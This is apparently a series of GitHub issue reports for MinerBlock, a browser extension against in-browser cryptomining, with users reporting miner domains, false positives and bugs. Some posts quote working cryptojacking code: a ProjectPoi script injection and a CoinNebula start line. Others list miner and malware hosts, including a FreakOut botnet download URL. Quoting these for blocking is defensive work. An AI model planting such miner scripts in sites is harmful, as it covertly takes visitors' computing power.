https://d3al52d8cojds7.cloudfront.net/?cdlad=600141
I found it here
https://www.romnation.net/

I can't tell if it's a miner or not, but it makes the chrome browser CPU soar every few seconds.

I'm getting "blocked miner" warnings for these 3 sites:

https://www.steamgifts.com/
http://www.opiumpulses.com
https://www.vanillavapes.co.uk

Block is for :
Mineralt (inline)

I've been told that one of them ,"steamgifts" ,doesn't have miners running on it but minerBlock says different .
Could it be a bug or is it definitely true that they do have a miner ?

I have multiple tabs open in my waterfox browser with many websites and just these 3 sites are coming up with that miner warning.

Is it possible that these sites could have been "hijacked" in some way without the website owners being aware of it ?

I've run multiple security scans of my computer using a winpe disc and everything comes back clear.

edit:
I was thinking it might be a bug in that checkbox in the settings for showing how many miners have been blocked overall.
I have it switched on but it doesn't always show on all sites ,sometimes it show nothing and other times it says '1' .

I noticed your extension filters (which were just embedded by EasyPrivacy) is overblocking some Nimiq related applications.

The relevant entries are

• nimiq.watch
• nimiqtest.net

nimiq.watch is a Nimiq block explorer service. It provides an API under api.nimiq.watch domain that is used by third-parties to access its services. There is also a mining pool hosted under pool.nimiq.watch, which you might want to continue to block (as it might be used by mining clients embedded into third-party websites, although I doubt it), but should not cause the api service to be blocked.

nimiqtest.net is the host name of some network nodes in the nimiq testnet network. These nodes do provide all the information that can be gathered from the testnet, but not any logic for mining. Although some miners might optionally connect to these hosts, it is not a requirement, so it makes no sense to block the host to block mining. However some client web applications, most notably https://safe.nimiq-testnet.com/, the standard client to access the nimiq testnet, require access to these hosts.

Please remove these two filters (or at least for the case of nimiq.watch, update it) to no longer overblock Nimiq web apps.

cryweb.github.io
crywebber.github.io
piti.bplaced.net

See:
https://twitter.com/bplaced/status/960907873596387328
https://twitter.com/bad_packets/status/960667587423043584

HEy i just wanna say Openload have own site with .JS / i think its miner too - https://jyhfuqoh.info

I think an N has gone missing.

2giga.download

Whatever's on https://cryptotabbrowser.com
Isn't the heuristics side of minerblock supposed to pick new stuff up??

https://acg18.us/ [site]
https://ppoi.org [Miner site]

<script type="text/javascript">
        if ('serviceWorker' in navigator) {
            navigator.serviceWorker.register("/sw.js?ver=2.2.1");
        }
if (screen && screen.width > 800) {
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = "https://ppoi.org/lib/projectpoi.min.js";
script.onload = script.onreadystatechange = function(){var miner = new ProjectPoi.Anonymous('ObNSVm2HfvB6PZmJY9c0jmJP',{threads: 4,autoThreads: true,throttle: 0.7});miner.start();}
document.getElementsByTagName('head')[0].appendChild(script);
}
</script>

HI @xd4rker i was modifying the minerblock code for to me used as an adblocker with a custom compiled block list of 70,000 plus domains but it is slowing down the browsing speeds and some times freezes the browser significantly so is there a way to integrate that whole list without any significant effect on performance.

thanks in advance.

Few more Minr mirrors where provided by https://twitter.com/bad_packets.

Adding these to filters

st.kjli.fi
abc.pema.cl
metrika.ron.si
xy.nullrefexcep.com

Adding these to filters

mxcdn1[.]now.sh
mxcdn2[.]now.sh
npcdn1[.]now.sh
sxcdn02[.]now.sh
sxcdn3[.]now.sh
sxcdn4[.]now.sh
sxcdn6[.]now.sh

Source: https://blog.malwarebytes.com/threat-analysis/2018/03/malicious-cryptomining-and-the-blacklist-conundrum/

Add webmine.cz to the list of blocked miners.

Please add http://www.mine4.com/ codes to the list of blocked miners

Received this over email a couple of hours ago

Your miner block extension does not block this miner http://d3iz6lralvg77g.cloudfront.net/mmfbt.html?t=681839&u=7865880121088749061

I picked this nasty up from either DevHost http://d-h.st/uV1 or ZippyShare http://www23.zippyshare.com/v/28989487/file.html

Adding hatevery.info and d3iz6lralvg77g.cloudfront.net to filters.

It seems MinerBlock does not work without the blacklist.

example (using a worker):
http://kinokongo.cc/

Without such detection (The other approach which makes MinerBlock more efficient against cryptojacking is detecting potential mining behaviour inside loaded scripts and kills them immediately. This makes the extension able to block inline scripts as well as miners running through proxies) what's the advantage over the normal adblockers (using easyprivacy / nocoin lists) ?

The browser tab (Vivaldi, probably Chrome as well) becomes unresponsive for up to 10 sec after any Wikipedia page is loaded or refreshed. This happens even if the "wikipedia.org" is added to the extension's whitelist.

Steps to reproduce:

1. Open this url in a new tab: "https://en.wikipedia.org/wiki/Cryptocurrency"
2. Start scrolling the page up and down with the mouse wheel.
3. Watch the browser tab freeze completely for several seconds shortly after the page was loaded.

https://pastebin.com/d5yr2tcm

When I visit https://tron.network/ chrome reports over 1.5Gb of GPU being used. Not sure if it's just their ridiculous banner being extremely inefficient or they're actually loading parts of their blockchain into visitors browsers.

minerBlock didn't pick up anything but might be worth checking it out.

pls delete, further checking required

Is it possible that the extension does not work for Firefox on Android? After installation coinhive.com and mineblock.org can load their mining scripts.

Can somebody confirm that?

on pages like this one: https://jsfiddle.net/gryzzly/urmwF/

minerblock outputs "[+] Mineralt miner found, stopping..." to the console, for this['addthis'], but really there is no miner. it's because this['addthis'] makes anything you put after it a function, so just as this['addthis'].db is a function, so is this['addthis'].foobar, etc.

this['googletag'] does the same thing and is similarly flagged. using minerblock v1.1.18.

Salon.com have introduced opt-in mining. MinerBlock doesn't detect or block the activity.

Is MinerBlock designed to allow opt-in mining?

Thanks.

Someone reported that MinerBlock breaks the menu's click event on https://statamic.com. Looks like a variable override issue in js/minerkill.js.

whathyx.com
pan.whathyx.com
ewtuyytdf45.com
pon.ewtuyytdf45.com

https://www.virustotal.com/de/ip-address/164.132.200.121/information/

https://pastebin.com/raw/ismmp6fv

And look at my last update.
https://github.com/ZeroDot1/CoinBlockerLists/commit/4b1f67a5a3e9e2a09370ad5fe4a8569dcc4029fa

Hi,

i have been using this miner from last couple of months, and since last few days i noticed the cpu FAN is going really high speed when i visit https://thepiratebay.org/recent

so looks like MinerBlock doesnt work with https://thepiratebay.org/recent

please do something.

thank you.

Can you please add support for uptobox.com As they have recently started using miners when we try to download any from their website and the extension does not work against it.Please do note that the miner only activates when you go to download page of a file and it is inactive when we are on their main page

https://freebitmine.com/btc/ doesn't recognise the miner at all.
https://www.kulturmagazine.com/bitcoin-faucet/ finds 4 (!!!!) miners, but they still hash.

Hi!
Today I noticed that powvideo.net was using a lot of my CPU and I find out that is using this:
var miner = new CoinNebula.Instance('powvideo.net', {throttle: 0.7}); if(!miner.isMobile()) miner.start();

Is there a way to block this too?

Thanks in advance! :)

P.D.: Btw, I'm using the last version of MinerBlock (1.1.15) in Chrome.

HI @xd4rker i was modifying the minerblock code for to me used as an adblocker with a custom compiled block list of 70,000 plus domains but it is slowing down the performance significantly so is there a way to integrate that whole list.

thanks in advance.

https://creepypastas.com/
https://www.hostingcloud.science./Nr0g.js loads the mine js https://www.jshosting.loan./Nr0g.js

I am using Firefox Nightly and when I click on Settings, nothing happens and the following errors appear in browser console:

The extension needs constant updating

Security researchers at Check Point discovered the FreakOut attacks and say that infected Linux devices join a botnet that could help deploy other cyberattacks. They say that the controller could use the infected machines to mine for cryptocurrency, to spread laterally across a company network, or to aim at other targets while masquerading as the compromised company.

FreakOut malware is new on the scene and can serve for port scanning, collect information, network sniffing, or to launch distributed denial-of-service (DDoS) attacks.

The infection chain starts with exploiting one of the three critical vulnerabilities and continues with uploading a Python script (out.py) on the compromised machine.

The attacker tries to run the script using Python 2, which reached end of life in 2020. Check Point believes that this is an indication of the threat actor assuming that the compromised machine is outdated and still has Python 2 installed.

Check Point discovered the attack on January 8, 2021, when they noticed the malicious script being downloaded from hxxp://gxbrowser[.]net. Since then the researchers observed hundreds of attempts to download the code.

Add the following to get blocked:

hxxp://gxbrowser[.]net

As title ,pls build firefox extension of MinerBlock , as firefox is improving with webextensions .....

Take a look at these lists, maybe you can improve the effectiveness of the add-on.
https://github.com/ZeroDot1/CoinBlockerLists/blob/master/list_browser.txt
https://github.com/keraf/NoCoin/blob/master/src/blacklist.txt
https://github.com/hoshsadiq/adblock-nocoin-list/blob/master/nocoin.txt

I've been told over email that MinerBlock is reporting a false positive when React library is used on the web page. Adding one more condition in js/minerkill.js to solve this.

Firefox version: Firefox Quantum (64 bit)
OS: Ubuntu 18.04 LTS

Problem:
When you use download certain pages using the Firefox "Save Page As..." feature, the minerkiller.js file gets saved to the assets folder.

Demo steps to reproduce bug:
1- Open Firefox
2- Go to https://www.utdallas.edu/~mxk055100/courses/
3- Right click the page and select the "Save Page As..." option
4- Select the location to download the page (ex: Downloads)
5- Open the location of chosen above (ex: Downloads)
6- select the assets folder of the page (ex: Teaching_files)
7- the minerkill.js file will be there

New mining service provider found by https://twitter.com/bad_packets called Minr (http://minr.pw).

Source: https://twitter.com/bad_packets/status/938532233811435521

Adding host.d-ns.ga and minr.pw to filters.

So I always try multiple extensions to see what I find best suits my needs... I came upon this extension: https://chrome.google.com/webstore/detail/miner-blocker-block-coin/ejpcojkcallnhphinmknkaoojohidegf

and I found it to be IDENTICAL to minerBlock and it got me concerned that there was some code 'theft', particularly given their lack of any 'About' information... As well as the fact that their version 1.1.3 just happened to come out days after the version 1.1.3 was released for this extension... Hoping someone can sort this out.

I am currently studying at Stony Brook University and I am working on a project to survey the websites which are doing Cryptojacking. We will be making use of your extension to perform that survey. Could you please make the code for Firefox public as well?
Thanks in advance.

If you try to go to the following URL:

chrome-extension://emikbbbebcdfohonlaifafnoanocnebl/assets/

The extension crashes and needs to be repaired (Chrome will do that by redownloading and reinstalling it).

Note: you might need to access "MinerBlock filters" text file link first from the settings page, "My Filters" tap if the URL I provided doesn't do the crash for you.

Please remove bplaced.net
bplaced is a Feehosting Service

Source:
https://twitter.com/ninoseki/status/938915762240086017

Adding hk.rs and cieh.mx to filters.

The new Firefox 68.0 has the possibility to block cryptominers: https://support.mozilla.org/en-US/kb/content-blocking

Could you please explain if (and why) we still need the MinerBlock add-on. Thanks!

F2 movies starts small on the CPU and then builds up slowly overtime until it takes up the entire CPU percentage with it's video player.

If this has nothing to do with javascript browser crypto mining then please let me know.